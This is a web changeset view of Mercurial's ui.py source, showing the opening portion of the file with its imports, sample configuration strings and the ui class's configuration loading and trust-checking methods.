##// END OF EJS Templates
path: forbid chaining `path://` definitions...
marmoute -
r47583:1ecf0823 default
parent child Browse files
Show More
@@ -1,2446 +1,2452 b''
1 # ui.py - user interface bits for mercurial
1 # ui.py - user interface bits for mercurial
2 #
2 #
3 # Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
3 # Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import collections
10 import collections
11 import contextlib
11 import contextlib
12 import datetime
12 import datetime
13 import errno
13 import errno
14 import getpass
14 import getpass
15 import inspect
15 import inspect
16 import os
16 import os
17 import re
17 import re
18 import signal
18 import signal
19 import socket
19 import socket
20 import subprocess
20 import subprocess
21 import sys
21 import sys
22 import traceback
22 import traceback
23
23
24 from .i18n import _
24 from .i18n import _
25 from .node import hex
25 from .node import hex
26 from .pycompat import (
26 from .pycompat import (
27 getattr,
27 getattr,
28 open,
28 open,
29 setattr,
29 setattr,
30 )
30 )
31
31
32 from . import (
32 from . import (
33 color,
33 color,
34 config,
34 config,
35 configitems,
35 configitems,
36 encoding,
36 encoding,
37 error,
37 error,
38 formatter,
38 formatter,
39 loggingutil,
39 loggingutil,
40 progress,
40 progress,
41 pycompat,
41 pycompat,
42 rcutil,
42 rcutil,
43 scmutil,
43 scmutil,
44 util,
44 util,
45 )
45 )
46 from .utils import (
46 from .utils import (
47 dateutil,
47 dateutil,
48 procutil,
48 procutil,
49 resourceutil,
49 resourceutil,
50 stringutil,
50 stringutil,
51 )
51 )
52
52
53 urlreq = util.urlreq
53 urlreq = util.urlreq
54
54
55 # for use with str.translate(None, _keepalnum), to keep just alphanumerics
55 # for use with str.translate(None, _keepalnum), to keep just alphanumerics
56 _keepalnum = b''.join(
56 _keepalnum = b''.join(
57 c for c in map(pycompat.bytechr, range(256)) if not c.isalnum()
57 c for c in map(pycompat.bytechr, range(256)) if not c.isalnum()
58 )
58 )
59
59
60 # The config knobs that will be altered (if unset) by ui.tweakdefaults.
60 # The config knobs that will be altered (if unset) by ui.tweakdefaults.
61 tweakrc = b"""
61 tweakrc = b"""
62 [ui]
62 [ui]
63 # The rollback command is dangerous. As a rule, don't use it.
63 # The rollback command is dangerous. As a rule, don't use it.
64 rollback = False
64 rollback = False
65 # Make `hg status` report copy information
65 # Make `hg status` report copy information
66 statuscopies = yes
66 statuscopies = yes
67 # Prefer curses UIs when available. Revert to plain-text with `text`.
67 # Prefer curses UIs when available. Revert to plain-text with `text`.
68 interface = curses
68 interface = curses
69 # Make compatible commands emit cwd-relative paths by default.
69 # Make compatible commands emit cwd-relative paths by default.
70 relative-paths = yes
70 relative-paths = yes
71
71
72 [commands]
72 [commands]
73 # Grep working directory by default.
73 # Grep working directory by default.
74 grep.all-files = True
74 grep.all-files = True
75 # Refuse to perform an `hg update` that would cause a file content merge
75 # Refuse to perform an `hg update` that would cause a file content merge
76 update.check = noconflict
76 update.check = noconflict
77 # Show conflicts information in `hg status`
77 # Show conflicts information in `hg status`
78 status.verbose = True
78 status.verbose = True
79 # Make `hg resolve` with no action (like `-m`) fail instead of re-merging.
79 # Make `hg resolve` with no action (like `-m`) fail instead of re-merging.
80 resolve.explicit-re-merge = True
80 resolve.explicit-re-merge = True
81
81
82 [diff]
82 [diff]
83 git = 1
83 git = 1
84 showfunc = 1
84 showfunc = 1
85 word-diff = 1
85 word-diff = 1
86 """
86 """
87
87
88 samplehgrcs = {
88 samplehgrcs = {
89 b'user': b"""# example user config (see 'hg help config' for more info)
89 b'user': b"""# example user config (see 'hg help config' for more info)
90 [ui]
90 [ui]
91 # name and email, e.g.
91 # name and email, e.g.
92 # username = Jane Doe <jdoe@example.com>
92 # username = Jane Doe <jdoe@example.com>
93 username =
93 username =
94
94
95 # We recommend enabling tweakdefaults to get slight improvements to
95 # We recommend enabling tweakdefaults to get slight improvements to
96 # the UI over time. Make sure to set HGPLAIN in the environment when
96 # the UI over time. Make sure to set HGPLAIN in the environment when
97 # writing scripts!
97 # writing scripts!
98 # tweakdefaults = True
98 # tweakdefaults = True
99
99
100 # uncomment to disable color in command output
100 # uncomment to disable color in command output
101 # (see 'hg help color' for details)
101 # (see 'hg help color' for details)
102 # color = never
102 # color = never
103
103
104 # uncomment to disable command output pagination
104 # uncomment to disable command output pagination
105 # (see 'hg help pager' for details)
105 # (see 'hg help pager' for details)
106 # paginate = never
106 # paginate = never
107
107
108 [extensions]
108 [extensions]
109 # uncomment the lines below to enable some popular extensions
109 # uncomment the lines below to enable some popular extensions
110 # (see 'hg help extensions' for more info)
110 # (see 'hg help extensions' for more info)
111 #
111 #
112 # histedit =
112 # histedit =
113 # rebase =
113 # rebase =
114 # uncommit =
114 # uncommit =
115 """,
115 """,
116 b'cloned': b"""# example repository config (see 'hg help config' for more info)
116 b'cloned': b"""# example repository config (see 'hg help config' for more info)
117 [paths]
117 [paths]
118 default = %s
118 default = %s
119
119
120 # path aliases to other clones of this repo in URLs or filesystem paths
120 # path aliases to other clones of this repo in URLs or filesystem paths
121 # (see 'hg help config.paths' for more info)
121 # (see 'hg help config.paths' for more info)
122 #
122 #
123 # default:pushurl = ssh://jdoe@example.net/hg/jdoes-fork
123 # default:pushurl = ssh://jdoe@example.net/hg/jdoes-fork
124 # my-fork = ssh://jdoe@example.net/hg/jdoes-fork
124 # my-fork = ssh://jdoe@example.net/hg/jdoes-fork
125 # my-clone = /home/jdoe/jdoes-clone
125 # my-clone = /home/jdoe/jdoes-clone
126
126
127 [ui]
127 [ui]
128 # name and email (local to this repository, optional), e.g.
128 # name and email (local to this repository, optional), e.g.
129 # username = Jane Doe <jdoe@example.com>
129 # username = Jane Doe <jdoe@example.com>
130 """,
130 """,
131 b'local': b"""# example repository config (see 'hg help config' for more info)
131 b'local': b"""# example repository config (see 'hg help config' for more info)
132 [paths]
132 [paths]
133 # path aliases to other clones of this repo in URLs or filesystem paths
133 # path aliases to other clones of this repo in URLs or filesystem paths
134 # (see 'hg help config.paths' for more info)
134 # (see 'hg help config.paths' for more info)
135 #
135 #
136 # default = http://example.com/hg/example-repo
136 # default = http://example.com/hg/example-repo
137 # default:pushurl = ssh://jdoe@example.net/hg/jdoes-fork
137 # default:pushurl = ssh://jdoe@example.net/hg/jdoes-fork
138 # my-fork = ssh://jdoe@example.net/hg/jdoes-fork
138 # my-fork = ssh://jdoe@example.net/hg/jdoes-fork
139 # my-clone = /home/jdoe/jdoes-clone
139 # my-clone = /home/jdoe/jdoes-clone
140
140
141 [ui]
141 [ui]
142 # name and email (local to this repository, optional), e.g.
142 # name and email (local to this repository, optional), e.g.
143 # username = Jane Doe <jdoe@example.com>
143 # username = Jane Doe <jdoe@example.com>
144 """,
144 """,
145 b'global': b"""# example system-wide hg config (see 'hg help config' for more info)
145 b'global': b"""# example system-wide hg config (see 'hg help config' for more info)
146
146
147 [ui]
147 [ui]
148 # uncomment to disable color in command output
148 # uncomment to disable color in command output
149 # (see 'hg help color' for details)
149 # (see 'hg help color' for details)
150 # color = never
150 # color = never
151
151
152 # uncomment to disable command output pagination
152 # uncomment to disable command output pagination
153 # (see 'hg help pager' for details)
153 # (see 'hg help pager' for details)
154 # paginate = never
154 # paginate = never
155
155
156 [extensions]
156 [extensions]
157 # uncomment the lines below to enable some popular extensions
157 # uncomment the lines below to enable some popular extensions
158 # (see 'hg help extensions' for more info)
158 # (see 'hg help extensions' for more info)
159 #
159 #
160 # blackbox =
160 # blackbox =
161 # churn =
161 # churn =
162 """,
162 """,
163 }
163 }
164
164
165
165
166 def _maybestrurl(maybebytes):
166 def _maybestrurl(maybebytes):
167 return pycompat.rapply(pycompat.strurl, maybebytes)
167 return pycompat.rapply(pycompat.strurl, maybebytes)
168
168
169
169
170 def _maybebytesurl(maybestr):
170 def _maybebytesurl(maybestr):
171 return pycompat.rapply(pycompat.bytesurl, maybestr)
171 return pycompat.rapply(pycompat.bytesurl, maybestr)
172
172
173
173
174 class httppasswordmgrdbproxy(object):
174 class httppasswordmgrdbproxy(object):
175 """Delays loading urllib2 until it's needed."""
175 """Delays loading urllib2 until it's needed."""
176
176
177 def __init__(self):
177 def __init__(self):
178 self._mgr = None
178 self._mgr = None
179
179
180 def _get_mgr(self):
180 def _get_mgr(self):
181 if self._mgr is None:
181 if self._mgr is None:
182 self._mgr = urlreq.httppasswordmgrwithdefaultrealm()
182 self._mgr = urlreq.httppasswordmgrwithdefaultrealm()
183 return self._mgr
183 return self._mgr
184
184
185 def add_password(self, realm, uris, user, passwd):
185 def add_password(self, realm, uris, user, passwd):
186 return self._get_mgr().add_password(
186 return self._get_mgr().add_password(
187 _maybestrurl(realm),
187 _maybestrurl(realm),
188 _maybestrurl(uris),
188 _maybestrurl(uris),
189 _maybestrurl(user),
189 _maybestrurl(user),
190 _maybestrurl(passwd),
190 _maybestrurl(passwd),
191 )
191 )
192
192
193 def find_user_password(self, realm, uri):
193 def find_user_password(self, realm, uri):
194 mgr = self._get_mgr()
194 mgr = self._get_mgr()
195 return _maybebytesurl(
195 return _maybebytesurl(
196 mgr.find_user_password(_maybestrurl(realm), _maybestrurl(uri))
196 mgr.find_user_password(_maybestrurl(realm), _maybestrurl(uri))
197 )
197 )
198
198
199
199
200 def _catchterm(*args):
200 def _catchterm(*args):
201 raise error.SignalInterrupt
201 raise error.SignalInterrupt
202
202
203
203
204 # unique object used to detect no default value has been provided when
204 # unique object used to detect no default value has been provided when
205 # retrieving configuration value.
205 # retrieving configuration value.
206 _unset = object()
206 _unset = object()
207
207
208 # _reqexithandlers: callbacks run at the end of a request
208 # _reqexithandlers: callbacks run at the end of a request
209 _reqexithandlers = []
209 _reqexithandlers = []
210
210
211
211
212 class ui(object):
212 class ui(object):
213 def __init__(self, src=None):
213 def __init__(self, src=None):
214 """Create a fresh new ui object if no src given
214 """Create a fresh new ui object if no src given
215
215
216 Use uimod.ui.load() to create a ui which knows global and user configs.
216 Use uimod.ui.load() to create a ui which knows global and user configs.
217 In most cases, you should use ui.copy() to create a copy of an existing
217 In most cases, you should use ui.copy() to create a copy of an existing
218 ui object.
218 ui object.
219 """
219 """
220 # _buffers: used for temporary capture of output
220 # _buffers: used for temporary capture of output
221 self._buffers = []
221 self._buffers = []
222 # 3-tuple describing how each buffer in the stack behaves.
222 # 3-tuple describing how each buffer in the stack behaves.
223 # Values are (capture stderr, capture subprocesses, apply labels).
223 # Values are (capture stderr, capture subprocesses, apply labels).
224 self._bufferstates = []
224 self._bufferstates = []
225 # When a buffer is active, defines whether we are expanding labels.
225 # When a buffer is active, defines whether we are expanding labels.
226 # This exists to prevent an extra list lookup.
226 # This exists to prevent an extra list lookup.
227 self._bufferapplylabels = None
227 self._bufferapplylabels = None
228 self.quiet = self.verbose = self.debugflag = self.tracebackflag = False
228 self.quiet = self.verbose = self.debugflag = self.tracebackflag = False
229 self._reportuntrusted = True
229 self._reportuntrusted = True
230 self._knownconfig = configitems.coreitems
230 self._knownconfig = configitems.coreitems
231 self._ocfg = config.config() # overlay
231 self._ocfg = config.config() # overlay
232 self._tcfg = config.config() # trusted
232 self._tcfg = config.config() # trusted
233 self._ucfg = config.config() # untrusted
233 self._ucfg = config.config() # untrusted
234 self._trustusers = set()
234 self._trustusers = set()
235 self._trustgroups = set()
235 self._trustgroups = set()
236 self.callhooks = True
236 self.callhooks = True
237 # Insecure server connections requested.
237 # Insecure server connections requested.
238 self.insecureconnections = False
238 self.insecureconnections = False
239 # Blocked time
239 # Blocked time
240 self.logblockedtimes = False
240 self.logblockedtimes = False
241 # color mode: see mercurial/color.py for possible value
241 # color mode: see mercurial/color.py for possible value
242 self._colormode = None
242 self._colormode = None
243 self._terminfoparams = {}
243 self._terminfoparams = {}
244 self._styles = {}
244 self._styles = {}
245 self._uninterruptible = False
245 self._uninterruptible = False
246 self.showtimestamp = False
246 self.showtimestamp = False
247
247
248 if src:
248 if src:
249 self._fout = src._fout
249 self._fout = src._fout
250 self._ferr = src._ferr
250 self._ferr = src._ferr
251 self._fin = src._fin
251 self._fin = src._fin
252 self._fmsg = src._fmsg
252 self._fmsg = src._fmsg
253 self._fmsgout = src._fmsgout
253 self._fmsgout = src._fmsgout
254 self._fmsgerr = src._fmsgerr
254 self._fmsgerr = src._fmsgerr
255 self._finoutredirected = src._finoutredirected
255 self._finoutredirected = src._finoutredirected
256 self._loggers = src._loggers.copy()
256 self._loggers = src._loggers.copy()
257 self.pageractive = src.pageractive
257 self.pageractive = src.pageractive
258 self._disablepager = src._disablepager
258 self._disablepager = src._disablepager
259 self._tweaked = src._tweaked
259 self._tweaked = src._tweaked
260
260
261 self._tcfg = src._tcfg.copy()
261 self._tcfg = src._tcfg.copy()
262 self._ucfg = src._ucfg.copy()
262 self._ucfg = src._ucfg.copy()
263 self._ocfg = src._ocfg.copy()
263 self._ocfg = src._ocfg.copy()
264 self._trustusers = src._trustusers.copy()
264 self._trustusers = src._trustusers.copy()
265 self._trustgroups = src._trustgroups.copy()
265 self._trustgroups = src._trustgroups.copy()
266 self.environ = src.environ
266 self.environ = src.environ
267 self.callhooks = src.callhooks
267 self.callhooks = src.callhooks
268 self.insecureconnections = src.insecureconnections
268 self.insecureconnections = src.insecureconnections
269 self._colormode = src._colormode
269 self._colormode = src._colormode
270 self._terminfoparams = src._terminfoparams.copy()
270 self._terminfoparams = src._terminfoparams.copy()
271 self._styles = src._styles.copy()
271 self._styles = src._styles.copy()
272
272
273 self.fixconfig()
273 self.fixconfig()
274
274
275 self.httppasswordmgrdb = src.httppasswordmgrdb
275 self.httppasswordmgrdb = src.httppasswordmgrdb
276 self._blockedtimes = src._blockedtimes
276 self._blockedtimes = src._blockedtimes
277 else:
277 else:
278 self._fout = procutil.stdout
278 self._fout = procutil.stdout
279 self._ferr = procutil.stderr
279 self._ferr = procutil.stderr
280 self._fin = procutil.stdin
280 self._fin = procutil.stdin
281 self._fmsg = None
281 self._fmsg = None
282 self._fmsgout = self.fout # configurable
282 self._fmsgout = self.fout # configurable
283 self._fmsgerr = self.ferr # configurable
283 self._fmsgerr = self.ferr # configurable
284 self._finoutredirected = False
284 self._finoutredirected = False
285 self._loggers = {}
285 self._loggers = {}
286 self.pageractive = False
286 self.pageractive = False
287 self._disablepager = False
287 self._disablepager = False
288 self._tweaked = False
288 self._tweaked = False
289
289
290 # shared read-only environment
290 # shared read-only environment
291 self.environ = encoding.environ
291 self.environ = encoding.environ
292
292
293 self.httppasswordmgrdb = httppasswordmgrdbproxy()
293 self.httppasswordmgrdb = httppasswordmgrdbproxy()
294 self._blockedtimes = collections.defaultdict(int)
294 self._blockedtimes = collections.defaultdict(int)
295
295
296 allowed = self.configlist(b'experimental', b'exportableenviron')
296 allowed = self.configlist(b'experimental', b'exportableenviron')
297 if b'*' in allowed:
297 if b'*' in allowed:
298 self._exportableenviron = self.environ
298 self._exportableenviron = self.environ
299 else:
299 else:
300 self._exportableenviron = {}
300 self._exportableenviron = {}
301 for k in allowed:
301 for k in allowed:
302 if k in self.environ:
302 if k in self.environ:
303 self._exportableenviron[k] = self.environ[k]
303 self._exportableenviron[k] = self.environ[k]
304
304
305 def _new_source(self):
305 def _new_source(self):
306 self._ocfg.new_source()
306 self._ocfg.new_source()
307 self._tcfg.new_source()
307 self._tcfg.new_source()
308 self._ucfg.new_source()
308 self._ucfg.new_source()
309
309
310 @classmethod
310 @classmethod
311 def load(cls):
311 def load(cls):
312 """Create a ui and load global and user configs"""
312 """Create a ui and load global and user configs"""
313 u = cls()
313 u = cls()
314 # we always trust global config files and environment variables
314 # we always trust global config files and environment variables
315 for t, f in rcutil.rccomponents():
315 for t, f in rcutil.rccomponents():
316 if t == b'path':
316 if t == b'path':
317 u.readconfig(f, trust=True)
317 u.readconfig(f, trust=True)
318 elif t == b'resource':
318 elif t == b'resource':
319 u.read_resource_config(f, trust=True)
319 u.read_resource_config(f, trust=True)
320 elif t == b'items':
320 elif t == b'items':
321 u._new_source()
321 u._new_source()
322 sections = set()
322 sections = set()
323 for section, name, value, source in f:
323 for section, name, value, source in f:
324 # do not set u._ocfg
324 # do not set u._ocfg
325 # XXX clean this up once immutable config object is a thing
325 # XXX clean this up once immutable config object is a thing
326 u._tcfg.set(section, name, value, source)
326 u._tcfg.set(section, name, value, source)
327 u._ucfg.set(section, name, value, source)
327 u._ucfg.set(section, name, value, source)
328 sections.add(section)
328 sections.add(section)
329 for section in sections:
329 for section in sections:
330 u.fixconfig(section=section)
330 u.fixconfig(section=section)
331 else:
331 else:
332 raise error.ProgrammingError(b'unknown rctype: %s' % t)
332 raise error.ProgrammingError(b'unknown rctype: %s' % t)
333 u._maybetweakdefaults()
333 u._maybetweakdefaults()
334 u._new_source() # anything after that is a different level
334 u._new_source() # anything after that is a different level
335 return u
335 return u
336
336
337 def _maybetweakdefaults(self):
337 def _maybetweakdefaults(self):
338 if not self.configbool(b'ui', b'tweakdefaults'):
338 if not self.configbool(b'ui', b'tweakdefaults'):
339 return
339 return
340 if self._tweaked or self.plain(b'tweakdefaults'):
340 if self._tweaked or self.plain(b'tweakdefaults'):
341 return
341 return
342
342
343 # Note: it is SUPER IMPORTANT that you set self._tweaked to
343 # Note: it is SUPER IMPORTANT that you set self._tweaked to
344 # True *before* any calls to setconfig(), otherwise you'll get
344 # True *before* any calls to setconfig(), otherwise you'll get
345 # infinite recursion between setconfig and this method.
345 # infinite recursion between setconfig and this method.
346 #
346 #
347 # TODO: We should extract an inner method in setconfig() to
347 # TODO: We should extract an inner method in setconfig() to
348 # avoid this weirdness.
348 # avoid this weirdness.
349 self._tweaked = True
349 self._tweaked = True
350 tmpcfg = config.config()
350 tmpcfg = config.config()
351 tmpcfg.parse(b'<tweakdefaults>', tweakrc)
351 tmpcfg.parse(b'<tweakdefaults>', tweakrc)
352 for section in tmpcfg:
352 for section in tmpcfg:
353 for name, value in tmpcfg.items(section):
353 for name, value in tmpcfg.items(section):
354 if not self.hasconfig(section, name):
354 if not self.hasconfig(section, name):
355 self.setconfig(section, name, value, b"<tweakdefaults>")
355 self.setconfig(section, name, value, b"<tweakdefaults>")
356
356
357 def copy(self):
357 def copy(self):
358 return self.__class__(self)
358 return self.__class__(self)
359
359
360 def resetstate(self):
360 def resetstate(self):
361 """Clear internal state that shouldn't persist across commands"""
361 """Clear internal state that shouldn't persist across commands"""
362 if self._progbar:
362 if self._progbar:
363 self._progbar.resetstate() # reset last-print time of progress bar
363 self._progbar.resetstate() # reset last-print time of progress bar
364 self.httppasswordmgrdb = httppasswordmgrdbproxy()
364 self.httppasswordmgrdb = httppasswordmgrdbproxy()
365
365
366 @contextlib.contextmanager
366 @contextlib.contextmanager
367 def timeblockedsection(self, key):
367 def timeblockedsection(self, key):
368 # this is open-coded below - search for timeblockedsection to find them
368 # this is open-coded below - search for timeblockedsection to find them
369 starttime = util.timer()
369 starttime = util.timer()
370 try:
370 try:
371 yield
371 yield
372 finally:
372 finally:
373 self._blockedtimes[key + b'_blocked'] += (
373 self._blockedtimes[key + b'_blocked'] += (
374 util.timer() - starttime
374 util.timer() - starttime
375 ) * 1000
375 ) * 1000
376
376
377 @contextlib.contextmanager
377 @contextlib.contextmanager
378 def uninterruptible(self):
378 def uninterruptible(self):
379 """Mark an operation as unsafe.
379 """Mark an operation as unsafe.
380
380
381 Most operations on a repository are safe to interrupt, but a
381 Most operations on a repository are safe to interrupt, but a
382 few are risky (for example repair.strip). This context manager
382 few are risky (for example repair.strip). This context manager
383 lets you advise Mercurial that something risky is happening so
383 lets you advise Mercurial that something risky is happening so
384 that control-C etc can be blocked if desired.
384 that control-C etc can be blocked if desired.
385 """
385 """
386 enabled = self.configbool(b'experimental', b'nointerrupt')
386 enabled = self.configbool(b'experimental', b'nointerrupt')
387 if enabled and self.configbool(
387 if enabled and self.configbool(
388 b'experimental', b'nointerrupt-interactiveonly'
388 b'experimental', b'nointerrupt-interactiveonly'
389 ):
389 ):
390 enabled = self.interactive()
390 enabled = self.interactive()
391 if self._uninterruptible or not enabled:
391 if self._uninterruptible or not enabled:
392 # if nointerrupt support is turned off, the process isn't
392 # if nointerrupt support is turned off, the process isn't
393 # interactive, or we're already in an uninterruptible
393 # interactive, or we're already in an uninterruptible
394 # block, do nothing.
394 # block, do nothing.
395 yield
395 yield
396 return
396 return
397
397
398 def warn():
398 def warn():
399 self.warn(_(b"shutting down cleanly\n"))
399 self.warn(_(b"shutting down cleanly\n"))
400 self.warn(
400 self.warn(
401 _(b"press ^C again to terminate immediately (dangerous)\n")
401 _(b"press ^C again to terminate immediately (dangerous)\n")
402 )
402 )
403 return True
403 return True
404
404
405 with procutil.uninterruptible(warn):
405 with procutil.uninterruptible(warn):
406 try:
406 try:
407 self._uninterruptible = True
407 self._uninterruptible = True
408 yield
408 yield
409 finally:
409 finally:
410 self._uninterruptible = False
410 self._uninterruptible = False
411
411
412 def formatter(self, topic, opts):
412 def formatter(self, topic, opts):
413 return formatter.formatter(self, self, topic, opts)
413 return formatter.formatter(self, self, topic, opts)
414
414
415 def _trusted(self, fp, f):
415 def _trusted(self, fp, f):
416 st = util.fstat(fp)
416 st = util.fstat(fp)
417 if util.isowner(st):
417 if util.isowner(st):
418 return True
418 return True
419
419
420 tusers, tgroups = self._trustusers, self._trustgroups
420 tusers, tgroups = self._trustusers, self._trustgroups
421 if b'*' in tusers or b'*' in tgroups:
421 if b'*' in tusers or b'*' in tgroups:
422 return True
422 return True
423
423
424 user = util.username(st.st_uid)
424 user = util.username(st.st_uid)
425 group = util.groupname(st.st_gid)
425 group = util.groupname(st.st_gid)
426 if user in tusers or group in tgroups or user == util.username():
426 if user in tusers or group in tgroups or user == util.username():
427 return True
427 return True
428
428
429 if self._reportuntrusted:
429 if self._reportuntrusted:
430 self.warn(
430 self.warn(
431 _(
431 _(
432 b'not trusting file %s from untrusted '
432 b'not trusting file %s from untrusted '
433 b'user %s, group %s\n'
433 b'user %s, group %s\n'
434 )
434 )
435 % (f, user, group)
435 % (f, user, group)
436 )
436 )
437 return False
437 return False
438
438
439 def read_resource_config(
439 def read_resource_config(
440 self, name, root=None, trust=False, sections=None, remap=None
440 self, name, root=None, trust=False, sections=None, remap=None
441 ):
441 ):
442 try:
442 try:
443 fp = resourceutil.open_resource(name[0], name[1])
443 fp = resourceutil.open_resource(name[0], name[1])
444 except IOError:
444 except IOError:
445 if not sections: # ignore unless we were looking for something
445 if not sections: # ignore unless we were looking for something
446 return
446 return
447 raise
447 raise
448
448
449 self._readconfig(
449 self._readconfig(
450 b'resource:%s.%s' % name, fp, root, trust, sections, remap
450 b'resource:%s.%s' % name, fp, root, trust, sections, remap
451 )
451 )
452
452
453 def readconfig(
453 def readconfig(
454 self, filename, root=None, trust=False, sections=None, remap=None
454 self, filename, root=None, trust=False, sections=None, remap=None
455 ):
455 ):
456 try:
456 try:
457 fp = open(filename, 'rb')
457 fp = open(filename, 'rb')
458 except IOError:
458 except IOError:
459 if not sections: # ignore unless we were looking for something
459 if not sections: # ignore unless we were looking for something
460 return
460 return
461 raise
461 raise
462
462
463 self._readconfig(filename, fp, root, trust, sections, remap)
463 self._readconfig(filename, fp, root, trust, sections, remap)
464
464
465 def _readconfig(
465 def _readconfig(
466 self, filename, fp, root=None, trust=False, sections=None, remap=None
466 self, filename, fp, root=None, trust=False, sections=None, remap=None
467 ):
467 ):
468 with fp:
468 with fp:
469 cfg = config.config()
469 cfg = config.config()
470 trusted = sections or trust or self._trusted(fp, filename)
470 trusted = sections or trust or self._trusted(fp, filename)
471
471
472 try:
472 try:
473 cfg.read(filename, fp, sections=sections, remap=remap)
473 cfg.read(filename, fp, sections=sections, remap=remap)
474 except error.ConfigError as inst:
474 except error.ConfigError as inst:
475 if trusted:
475 if trusted:
476 raise
476 raise
477 self.warn(
477 self.warn(
478 _(b'ignored %s: %s\n') % (inst.location, inst.message)
478 _(b'ignored %s: %s\n') % (inst.location, inst.message)
479 )
479 )
480
480
481 self._applyconfig(cfg, trusted, root)
481 self._applyconfig(cfg, trusted, root)
482
482
483 def applyconfig(self, configitems, source=b"", root=None):
483 def applyconfig(self, configitems, source=b"", root=None):
484 """Add configitems from a non-file source. Unlike with ``setconfig()``,
484 """Add configitems from a non-file source. Unlike with ``setconfig()``,
485 they can be overridden by subsequent config file reads. The items are
485 they can be overridden by subsequent config file reads. The items are
486 in the same format as ``configoverride()``, namely a dict of the
486 in the same format as ``configoverride()``, namely a dict of the
487 following structures: {(section, name) : value}
487 following structures: {(section, name) : value}
488
488
489 Typically this is used by extensions that inject themselves into the
489 Typically this is used by extensions that inject themselves into the
490 config file load procedure by monkeypatching ``localrepo.loadhgrc()``.
490 config file load procedure by monkeypatching ``localrepo.loadhgrc()``.
491 """
491 """
492 cfg = config.config()
492 cfg = config.config()
493
493
494 for (section, name), value in configitems.items():
494 for (section, name), value in configitems.items():
495 cfg.set(section, name, value, source)
495 cfg.set(section, name, value, source)
496
496
497 self._applyconfig(cfg, True, root)
497 self._applyconfig(cfg, True, root)
498
498
499 def _applyconfig(self, cfg, trusted, root):
499 def _applyconfig(self, cfg, trusted, root):
500 if self.plain():
500 if self.plain():
501 for k in (
501 for k in (
502 b'debug',
502 b'debug',
503 b'fallbackencoding',
503 b'fallbackencoding',
504 b'quiet',
504 b'quiet',
505 b'slash',
505 b'slash',
506 b'logtemplate',
506 b'logtemplate',
507 b'message-output',
507 b'message-output',
508 b'statuscopies',
508 b'statuscopies',
509 b'style',
509 b'style',
510 b'traceback',
510 b'traceback',
511 b'verbose',
511 b'verbose',
512 ):
512 ):
513 if k in cfg[b'ui']:
513 if k in cfg[b'ui']:
514 del cfg[b'ui'][k]
514 del cfg[b'ui'][k]
515 for k, v in cfg.items(b'defaults'):
515 for k, v in cfg.items(b'defaults'):
516 del cfg[b'defaults'][k]
516 del cfg[b'defaults'][k]
517 for k, v in cfg.items(b'commands'):
517 for k, v in cfg.items(b'commands'):
518 del cfg[b'commands'][k]
518 del cfg[b'commands'][k]
519 for k, v in cfg.items(b'command-templates'):
519 for k, v in cfg.items(b'command-templates'):
520 del cfg[b'command-templates'][k]
520 del cfg[b'command-templates'][k]
521 # Don't remove aliases from the configuration if in the exceptionlist
521 # Don't remove aliases from the configuration if in the exceptionlist
522 if self.plain(b'alias'):
522 if self.plain(b'alias'):
523 for k, v in cfg.items(b'alias'):
523 for k, v in cfg.items(b'alias'):
524 del cfg[b'alias'][k]
524 del cfg[b'alias'][k]
525 if self.plain(b'revsetalias'):
525 if self.plain(b'revsetalias'):
526 for k, v in cfg.items(b'revsetalias'):
526 for k, v in cfg.items(b'revsetalias'):
527 del cfg[b'revsetalias'][k]
527 del cfg[b'revsetalias'][k]
528 if self.plain(b'templatealias'):
528 if self.plain(b'templatealias'):
529 for k, v in cfg.items(b'templatealias'):
529 for k, v in cfg.items(b'templatealias'):
530 del cfg[b'templatealias'][k]
530 del cfg[b'templatealias'][k]
531
531
532 if trusted:
532 if trusted:
533 self._tcfg.update(cfg)
533 self._tcfg.update(cfg)
534 self._tcfg.update(self._ocfg)
534 self._tcfg.update(self._ocfg)
535 self._ucfg.update(cfg)
535 self._ucfg.update(cfg)
536 self._ucfg.update(self._ocfg)
536 self._ucfg.update(self._ocfg)
537
537
538 if root is None:
538 if root is None:
539 root = os.path.expanduser(b'~')
539 root = os.path.expanduser(b'~')
540 self.fixconfig(root=root)
540 self.fixconfig(root=root)
541
541
542 def fixconfig(self, root=None, section=None):
542 def fixconfig(self, root=None, section=None):
543 if section in (None, b'paths'):
543 if section in (None, b'paths'):
544 # expand vars and ~
544 # expand vars and ~
545 # translate paths relative to root (or home) into absolute paths
545 # translate paths relative to root (or home) into absolute paths
546 root = root or encoding.getcwd()
546 root = root or encoding.getcwd()
547 for c in self._tcfg, self._ucfg, self._ocfg:
547 for c in self._tcfg, self._ucfg, self._ocfg:
548 for n, p in c.items(b'paths'):
548 for n, p in c.items(b'paths'):
549 # Ignore sub-options.
549 # Ignore sub-options.
550 if b':' in n:
550 if b':' in n:
551 continue
551 continue
552 if not p:
552 if not p:
553 continue
553 continue
554 if b'%%' in p:
554 if b'%%' in p:
555 s = self.configsource(b'paths', n) or b'none'
555 s = self.configsource(b'paths', n) or b'none'
556 self.warn(
556 self.warn(
557 _(b"(deprecated '%%' in path %s=%s from %s)\n")
557 _(b"(deprecated '%%' in path %s=%s from %s)\n")
558 % (n, p, s)
558 % (n, p, s)
559 )
559 )
560 p = p.replace(b'%%', b'%')
560 p = p.replace(b'%%', b'%')
561 p = util.expandpath(p)
561 p = util.expandpath(p)
562 if not util.hasscheme(p) and not os.path.isabs(p):
562 if not util.hasscheme(p) and not os.path.isabs(p):
563 p = os.path.normpath(os.path.join(root, p))
563 p = os.path.normpath(os.path.join(root, p))
564 c.alter(b"paths", n, p)
564 c.alter(b"paths", n, p)
565
565
566 if section in (None, b'ui'):
566 if section in (None, b'ui'):
567 # update ui options
567 # update ui options
568 self._fmsgout, self._fmsgerr = _selectmsgdests(self)
568 self._fmsgout, self._fmsgerr = _selectmsgdests(self)
569 self.debugflag = self.configbool(b'ui', b'debug')
569 self.debugflag = self.configbool(b'ui', b'debug')
570 self.verbose = self.debugflag or self.configbool(b'ui', b'verbose')
570 self.verbose = self.debugflag or self.configbool(b'ui', b'verbose')
571 self.quiet = not self.debugflag and self.configbool(b'ui', b'quiet')
571 self.quiet = not self.debugflag and self.configbool(b'ui', b'quiet')
572 if self.verbose and self.quiet:
572 if self.verbose and self.quiet:
573 self.quiet = self.verbose = False
573 self.quiet = self.verbose = False
574 self._reportuntrusted = self.debugflag or self.configbool(
574 self._reportuntrusted = self.debugflag or self.configbool(
